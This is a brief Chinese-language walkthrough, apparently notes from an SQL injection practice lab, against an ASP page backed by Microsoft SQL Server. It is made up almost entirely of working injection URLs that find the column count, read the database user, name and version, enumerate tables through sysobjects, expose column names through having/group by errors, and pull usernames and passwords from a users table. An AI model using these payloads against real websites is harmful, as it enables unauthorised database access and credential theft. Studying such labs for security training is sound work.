还是一样首先判断闭合方式
然后再来试列数
这里order by 4报错说明有三列
这里查看完回显点直接看用户跟数据库名
/less-1.asp?id=-1' union select 1,user,db_name() --+
再查看一下数据库版本信息
/less-1.asp?id=-1' union select 1,@@version,db_name() --+
再查看数据库名
/less-1.asp?id=-1' and 1=(select top 1 name from sysobjects where xtype='U' and name !='users') --+
查看表中的列
/less-1.asp?id=-1' having 1=1 --+
再查看别的列/less-1.asp?id=-1' group by id having 1=1 --+
查看表中的具体内容
/less-1.asp?id=-1' and 1=2 union all select 1,(select top 1 username from users),(select top 1 password from users)--+